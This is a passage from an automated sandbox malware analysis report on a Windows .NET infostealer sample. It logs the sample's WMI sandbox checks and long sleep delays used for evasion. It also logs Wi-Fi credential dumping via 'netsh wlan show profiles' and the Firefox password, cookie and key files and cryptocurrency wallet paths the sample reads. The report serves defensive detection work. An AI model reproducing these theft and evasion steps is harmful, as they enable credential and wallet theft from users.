'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607791D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $ro\W;.VBP
    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/2@3/3
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3156:304:WilStaging_02
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File created: C:\Users\user\AppData\Local\Temp\downloadedFile.exe
    Source: iGxCM2I5u9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: iGxCM2I5u9.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D9000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFB3000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0AA000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F006000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F197000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F08E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F06D000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFD4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F176000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1B8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607799A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F157000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5B000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
    Source: iGxCM2I5u9.exe | ReversingLabs: Detection: 65%
    Source: unknown | Process created: C:\Users\user\Desktop\iGxCM2I5u9.exe "C:\Users\user\Desktop\iGxCM2I5u9.exe"
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr All
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: rasapi32.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: rasman.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: rtutils.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: secur32.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: dwrite.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: napinsp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: pnrpnsp.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: wshbth.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: nlaapi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Section loaded: winrnr.dll
    Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
    Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: edgegdi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\findstr.exe | Section loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: iGxCM2I5u9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: iGxCM2I5u9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: iGxCM2I5u9.exe | Static PE information: 0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Code function: 0_2_00007FFBC7C59725 push cs; iretd 0_2_00007FFBC7C5976A
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Code function: 0_2_00007FFBC7C500BD pushad ; iretd 0_2_00007FFBC7C500C1
    Source: iGxCM2I5u9.exe, YNQggCGIprkgfKSFO.cs | High entropy of concatenated method names: 'yaQsiQjOIaNVMcbsUYNIYqAma', 'jfoqIjiIQWJffAwStf', 'UfHEmpurGaIZdSGgDaSRemDM', 'josMLGwUrGx', 'aBAOrciIwfNZTtrbOQ', 'bvzDBBfvTLEmMJFcZRDm', 'UDIDbTtRPVGbY', 'fbyzMMhOwstBQOQS', 'KdXGrrzaildEq', 'LnnZBaSqadFHQKZCeBxLwxAOn'
    Source: iGxCM2I5u9.exe, eUZcfxaGLVMSHSrJHtKYI.cs | High entropy of concatenated method names: 'SBohrrBlujVWUCRUM', 'PsypwigwOSQgzEKjUU', 'XuiosVQmdMlQIDiMyYdFFAuc', 'UOjQLkhwaoghDGTfvCkd', 'IcRsMLrPoW', 'GEXHgWRcDUhOBfuSJZKyKyhMl', 'YzZqgmShbyiMzZk', 'ahaNQNSshpeY', 'HXLVPxSCMnvwTEvkxakNCX', 'lXALggIrHu'
    Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.cs | High entropy of concatenated method names: 'vAoWMpNCmxjb', 'iqybDWaoMVQZhh', 'KuSWxWkxGQMByqEkVWfAmp', 'HwJSjeXwfHarseNesyt', 'KqVcyIkvCBhBVPLaoEASjTh', 'YzMGIsmBswUQbhUbubtdaYVc', 'mpoxbJrJbDywenK', 'fJZvuzHjZYHZDS', 'djnVCyEQncHzdVfPojOvPwhYn', 'EYDBSGIEVMrRHQbslSnz'
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_PnPEntity
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Memory allocated: 1605EA70000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Memory allocated: 16076D30000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 600000
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599875
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599766
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599657
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599532
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599407
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599282
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599157
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 599047
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 598938
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 598813
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 598688
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 598563
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Thread delayed: delay time: 598438
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Window / User API: threadDelayed 9865
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -600000s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599875s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599766s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599657s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599532s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599407s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599282s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599157s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -599047s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -598938s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -598813s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -598688s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -598563s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe TID: 4216 | Thread sleep time: -598438s >= -30000s
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Version FROM Win32_BIOS
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605D000000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure DriverSystemEnableMicrosoft Hyper-V Virtualization Infrastructure Driver
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Process token adjusted: Debug
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Memory allocated: page read and write | page guard
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr All
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ACTIVE WINDOW: Program Managerp^
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Managerp^
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ACTIVE WINDOW: Program Manager
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Users\user\Desktop\iGxCM2I5u9.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    Source: Yara match File source: Process Memory Space: iGxCM2I5u9.exe PID: 7544, type: MEMORYSTR
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Application Data Electrum
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Google Jaxx
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F12E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Application Data ExodusWeb3
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\kzpbmws1.default\logins.json
